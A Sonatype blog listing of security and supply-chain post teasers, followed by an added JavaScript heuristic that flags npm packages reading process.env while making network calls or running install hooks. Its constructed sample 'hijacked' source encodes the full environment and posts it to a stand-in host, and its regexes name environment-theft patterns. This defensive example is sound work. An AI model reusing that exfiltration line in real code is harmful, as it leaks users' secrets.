Sonatype Blog NEW 2024
Conversations about software supply automation, devsecops, open source, continuous delivery, and application security.

How SBOMs power secure software acquisition
April Downey | dependencies, SBOM, software bill of materials, Software Composition Analysis, software supply chain
CISA's Supply Chain Integrity Month reminds us of an undeniable truth about modern software development: transparency in software supply chains is no longer optional. The theme of week 4 is "Transparency: Securing ...

Build smarter with AI and your software supply chain
Aaron Linskens | Artificial Intelligence, Events and Webinars, generative AI, open source, software supply chain governance
AI adoption is reshaping how software gets built. From coding assistants to full-fledged agentic AI applications, developers now routinely rely on artificial intelligence in their workflows. But a subtler shift is also ...

Elevate your organization's success: Submissions now open for the 2025 Sonatype Elevate Awards
We are thrilled to announce that the 2025 Sonatype Elevate Awards are officially open for submissions ...

Shadow downloads – How developers have become the new perimeter
With great power comes great responsibility ...

5 reasons to not miss Sonatype at RSAC 2025
RSA Conference (RSAC) brings together cybersecurity practitioners from across the globe to learn about the latest cybersecurity defense strategies and tools, connect with industry peers, and share knowledge about the threat landscape ...

What’s happening with MITRE and the CVE program uncertainty
Yesterday's headlines have sent ripples through the cybersecurity and software supply chain communities: MITRE announced that U.S. government funding for the CVE (Common Vulnerabilities and Exposures) database was set to expire today ...

Open Source Malware Index Q1 2025: Data exfil threats rising sharply
Sonatype Security Research Team | Everything Open Source, Malware, Malware Analysis, open source management
Sonatype's ongoing mission is to equip organizations with the most up-to-date information on open source security threats. As part of that commitment, we will be sharing data and insights on a quarterly ...

Using Sonatype Nexus Repository with the new Docker Hub rate limits
Beginning April 1, 2025, Docker will introduce new pull rate limits on Docker Hub, following the limits it first introduced in 2020. In this blog, we will discuss how Docker Hub's ...

How SBOMs drive a smarter SCA strategy
Aaron Linskens | SBOM, SBOM Manager, secure software supply chain, shift left, Software Composition Analysis
Modern software is largely assembled from open source components, constituting up to 90% of today's codebases. Managing the security and compliance risks associated with this external code is no longer optional — ...

Multiple crypto packages hijacked, turned into info-stealers
Sonatype has identified multiple npm cryptocurrency packages whose latest versions have been hijacked and altered to steal sensitive information, such as environment variables, from victims who install them ...
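The teaser above describes hijacked package versions that read environment variables and send them off the host. The script below is an added example, not Sonatype's code and not taken from the affected packages: a small heuristic that flags a package whose source both reads `process.env` and makes an outbound connection, or that gains an install-time lifecycle script, which is the combination a practitioner would triage first when a patch release of a dependency looks unexpected. The sample packages, their sources, the pattern lists and the `example.invalid` hostname are all constructed here for illustration.

```javascript
// Added example (not from the original post): heuristic triage for npm
// package sources that read process.env and reach the network.
// Patterns and sample inputs below are constructed assumptions, not
// signatures derived from any real hijacked package.

// Reads of the process environment.
const ENV_READ = /process\.env\b/;
// Common outbound-network entry points in Node code.
const NETWORK = /\b(https?\.request|https?\.get|fetch|XMLHttpRequest|net\.connect|dns\.resolve|axios|got)\s*\(/;
// Environment being serialised or encoded right before it leaves the host.
const ENCODE = /\b(JSON\.stringify|Buffer\.from|btoa)\s*\(\s*process\.env/;

// Lifecycle scripts npm runs automatically during `npm install`; a new one
// appearing in a patch release is the first thing to look at.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

function scanSource(name, src) {
  const readsEnv = ENV_READ.test(src);
  const network = NETWORK.test(src);
  const encodesEnv = ENCODE.test(src);
  return { name, readsEnv, network, encodesEnv, suspicious: readsEnv && network };
}

function scanInstallScripts(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return INSTALL_HOOKS.filter((hook) => hook in scripts);
}

// Combine both signals: env read + network, or env read from an install hook.
function audit(pkgJson, src) {
  const report = scanSource(pkgJson.name, src);
  report.installScripts = scanInstallScripts(pkgJson);
  report.suspicious = report.suspicious || (report.installScripts.length > 0 && report.readsEnv);
  return report;
}

// Constructed sample inputs (not real packages).
const benignPkg = { name: 'good-lib', version: '1.0.0', scripts: { test: 'node test.js' } };
const benignSrc = 'module.exports = (a, b) => a + b;';

const hijackedPkg = { name: 'crypto-lib', version: '1.0.1', scripts: { postinstall: 'node setup.js' } };
const hijackedSrc = [
  "const https = require('https');",
  "const payload = Buffer.from(JSON.stringify(process.env)).toString('base64');",
  "https.request({ hostname: 'example.invalid', method: 'POST', path: '/' + payload }).end();",
].join('\n');

// Stand-alone run: print one line per package.
for (const [pkg, src] of [[benignPkg, benignSrc], [hijackedPkg, hijackedSrc]]) {
  const r = audit(pkg, src);
  console.log(`${r.name}@${pkg.version}: suspicious=${r.suspicious} installScripts=${r.installScripts.join(',') || '-'}`);
}
```

This is a triage heuristic, not a verdict: legitimate build tooling also reads `process.env` and talks to the network, so a hit means "read the diff of this release", and a miss means nothing if the payload is obfuscated. Running the package's scripts is never part of the check; read the source as text, as above.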